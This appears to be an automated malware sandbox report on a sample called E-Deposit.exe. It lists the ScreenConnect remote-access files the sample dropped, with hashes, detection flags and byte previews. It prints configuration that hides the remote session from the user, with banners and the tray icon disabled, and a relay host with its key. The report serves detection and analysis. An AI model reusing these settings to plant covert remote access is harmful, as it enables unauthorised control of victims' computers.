                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):95512
                                                                                  Entropy (8bit):6.504684691533346
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                  MD5:75B21D04C69128A7230A0998086B61AA
                                                                                  SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                  SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                  SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):548864
                                                                                  Entropy (8bit):6.034211651049746
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                  MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                  SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                  SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                  SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1721856
                                                                                  Entropy (8bit):6.639085961200334
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                  MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                  SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                  SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                  SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsAuthenticationPackage.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):260168
                                                                                  Entropy (8bit):6.416438906122177
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                  MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                  SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                  SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                  SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):61208
                                                                                  Entropy (8bit):6.310126082367387
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                  MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                  SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                  SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                  SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):602392
                                                                                  Entropy (8bit):6.176232491934078
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                  MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                  SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                  SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                  SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe.config

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):842248
                                                                                  Entropy (8bit):6.268561504485627
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                  MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                  SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                  SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                  SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):81688
                                                                                  Entropy (8bit):5.8618809599146005
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                                  MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                                  SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                                  SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                                  SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe.config

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):266
                                                                                  Entropy (8bit):4.842791478883622
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                  MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                  SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                  SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                  SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\app.config

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):951
                                                                                  Entropy (8bit):4.682753739900415
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:389hK55AfdHva/dHvc/dHvidHvJOPdHvLOPdHvP:OhY5AfdHS/dH0/dH6dHAdHKdHX
                                                                                  MD5:A86EDEABE4F506104C9B4A70EC058203
                                                                                  SHA1:90F2C46B4C7EA592EE2027CBE85239878B21CD65
                                                                                  SHA-256:1559FF67FB04A2DEB98A1733D1E1B61DD48D406CF70A0A1D2F386EE65ACD805E
                                                                                  SHA-512:B5261E93D9DD436B885661E57AA2F75654B50675DDF8DEA06AEF0DB0E02AD9194A80DFFAB93A7FDC10B20EB1A1AF36E80E8C4069F7004BD5C69DB675CA17DCA2
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowBalloonOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowBalloonOnHide" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowSystemTrayIcon" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="ShowSystemTrayIcon" serializeAs="String">.. <value>false</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\system.config

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with very long lines (466), with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):956
                                                                                  Entropy (8bit):5.7620094502294785
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2dL9hK6E4dl/m5nudKr2eKHWO+jI/RKLmc3vH:chh7HHFdnHHH+jcRKx3v
                                                                                  MD5:5BEECFFFFC74F49700D1EAC5A1AC5545
                                                                                  SHA1:F7FFBDC8E37A62B480DDD3D04A52F8A3418D5F20
                                                                                  SHA-256:257FA1FF9F14E80025ACBEA5CEB1EE308C32A948289361F8DCDA666C82B8FB82
                                                                                  SHA-512:B0E447C5062116E2B1F6AB5E619D095B63E85076F83E912BF038CEB6DC7984F0E5FF0FF26FFABE5ABD5CCEAE498B1562EB63784A8C019551FAAD3B828FEFBC85
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=slplegalfinance.com&amp;p=443&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\E-Deposit.exe.log

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\E-Deposit.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):321
                                                                                  Entropy (8bit):5.36509199858051
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTrM3RJoDLIP12MUAvvR+uCv:Q3La/KDLI4MWuPTArkvoDLI4MWuCv
                                                                                  MD5:1CF2352B684EF57925D98E766BA897F2
                                                                                  SHA1:6E8CB2C1143E9D9D1211BAA811FE4CAA49C08B55
                                                                                  SHA-256:43C3FB3C0B72A899C5442DAC8748D019D800E0A9421D3677EB96E196ED285290
                                                                                  SHA-512:9F2D6F89453C867386A65A04FF96067FC3B23A99A4BCE0ECD227E130F409069FE6DD202D4839CBF204C3F204EC058D6CDFDADA7DD212BC2356D74FEC97F22061
                                                                                  Malicious:true
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):746
                                                                                  Entropy (8bit):5.349174276064173
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
                                                                                  MD5:ED994980CB1AABB953B2C8ECDC745E1F
                                                                                  SHA1:9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
                                                                                  SHA-256:D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
                                                                                  SHA-512:61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

                                                                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                  Category:dropped
                                                                                  Size (bytes):1088392
                                                                                  Entropy (8bit):7.789940577622617
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:QUUGGHn+rUGemcPe9MpKL4Plb2sZWV+tLv0QYu5OPthT+gd:jGHpRPqMpvlqs0O4iO2k
                                                                                  MD5:8A8767F589EA2F2C7496B63D8CCC2552
                                                                                  SHA1:CC5DE8DD18E7117D8F2520A51EDB1D165CAE64B0
                                                                                  SHA-256:0918D8AB2237368A5CEC8CE99261FB07A1A1BEEDA20464C0F91AF0FE3349636B
                                                                                  SHA-512:518231213CA955ACDF37B4501FDE9C5B15806D4FC166950EB8706E8D3943947CF85324FAEE806D7DF828485597ECEFFCFA05CA1A5D8AB1BD51ED12DF963A1FE4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\CustomAction.config

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):234
                                                                                  Entropy (8bit):4.977464602412109
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:JiMVBdTMkIffVymRMT4/0xC/C7VrfC7VNQpuAW4QIT:MMHd413VymhsS+Qg93xT
                                                                                  MD5:6F52EBEA639FD7CEFCA18D9E5272463E
                                                                                  SHA1:B5E8387C2EB20DD37DF8F4A3B9B0E875FA5415E3
                                                                                  SHA-256:7027B69AB6EBC9F3F7D2F6C800793FDE2A057B76010D8CFD831CF440371B2B23
                                                                                  SHA-512:B5960066430ED40383D39365EADB3688CADADFECA382404924024C908E32C670AFABD37AB41FF9E6AC97491A5EB8B55367D7199002BF8569CF545434AB2F271A
                                                                                  Malicious:false
                                                                                  Preview:.<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>..</configuration>

                                                                                  C:\Users\user\AppData\Local\Temp\MSICCC5.tmp-\Microsoft.Deployment.Compression.Cab.dll

                                                                                  Download File
